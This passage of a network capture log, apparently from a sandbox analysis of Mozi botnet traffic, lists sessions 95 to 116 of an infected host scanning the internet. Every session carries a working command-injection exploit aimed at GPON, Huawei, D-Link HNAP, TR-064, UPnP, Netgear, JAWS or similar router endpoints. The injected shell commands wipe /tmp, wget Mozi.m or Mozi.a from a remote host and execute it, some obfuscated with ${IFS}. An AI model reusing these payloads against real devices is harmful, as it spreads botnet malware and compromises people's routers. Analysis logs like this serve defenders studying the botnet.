                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              95192.168.2.2354806143.186.21.17380
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264961004 CET328OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                              Host: 127.0.0.1:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Content-Length: 118
                                                              Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                              Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              96192.168.2.233855013.9.189.737215
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264986992 CET818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                              Host: 13.9.189.7:37215
                                                              Content-Length: 601
                                                              Connection: keep-alive
                                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              97192.168.2.235033283.96.191.13680
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265021086 CET802OUTPOST /HNAP1/ HTTP/1.0
                                                              Host: 83.96.191.136:80
                                                              Content-Type: text/xml; charset="utf-8"
                                                              SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                              Content-Length: 640
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              98192.168.2.2348516186.251.44.2095555
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265043974 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                              Host: 127.0.0.1:5555
                                                              User-Agent: Hello, world
                                                              SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                              Content-Type: text/xml
                                                              Content-Length: 640
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              99192.168.2.2342356166.192.145.3949152
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265074015 CET932OUTPOST /soap.cgi?service=WANIPConn1 HTTP/1.1
                                                              Host: 166.192.145.39:49152
                                                              Content-Length: 630
                                                              Accept-Encoding: gzip, deflate
                                                              SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Connection: keep-alive
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 6d 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 6d 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              100192.168.2.2338568211.70.46.518080
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265090942 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              101192.168.2.2353920196.115.212.1718443
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265106916 CET138OUTGET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.
                                                              Data Raw:
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              102192.168.2.2355502187.147.83.58080
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265129089 CET120OUTGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
                                                              Data Raw:
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              103192.168.2.234299414.232.148.19380
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265142918 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              104192.168.2.2353384162.198.43.2278080
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265162945 CET334OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                              Host: 127.0.0.1:8080
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Content-Length: 118
                                                              Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 26 69 70 76 3d 30
                                                              Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              105192.168.2.2355738154.140.14.680
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265188932 CET279OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                              User-Agent: Hello, world
                                                              Host: 154.140.14.6:80
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                              Connection: keep-alive


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              106192.168.2.2354192186.173.246.16480
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265212059 CET282OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                              User-Agent: Hello, world
                                                              Host: 186.173.246.164:80
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                              Connection: keep-alive


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              107192.168.2.2360138118.30.132.23581
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265233994 CET170OUTGET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              108192.168.2.235933634.57.137.15380
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265253067 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              109192.168.2.2356074139.77.12.1758443
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265271902 CET138OUTGET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.
                                                              Data Raw:
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              110192.168.2.2352520140.9.134.1335555
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265295982 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                              Host: 127.0.0.1:5555
                                                              User-Agent: Hello, world
                                                              SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                              Content-Type: text/xml
                                                              Content-Length: 640
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              111192.168.2.234867640.223.116.25480
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265317917 CET328OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                              Host: 127.0.0.1:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Content-Length: 118
                                                              Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                              Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              112192.168.2.233406616.29.234.24480
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265340090 CET280OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                              User-Agent: Hello, world
                                                              Host: 16.29.234.244:80
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                              Connection: keep-alive


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              113192.168.2.2354080110.142.198.15849152
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265374899 CET933OUTPOST /soap.cgi?service=WANIPConn1 HTTP/1.1
                                                              Host: 110.142.198.158:49152
                                                              Content-Length: 630
                                                              Accept-Encoding: gzip, deflate
                                                              SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Connection: keep-alive
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 6d 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 6d 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              114192.168.2.233489663.44.16.2378443
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265389919 CET138OUTGET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.
                                                              Data Raw:
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              115192.168.2.2353648162.83.75.11081
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265409946 CET170OUTGET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              116192.168.2.2358450148.225.57.16980
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265430927 CET803OUTPOST /HNAP1/ HTTP/1.0
                                                              Host: 148.225.57.169:80
                                                              Content-Type: text/xml; charset="utf-8"
                                                              SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                              Content-Length: 640
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
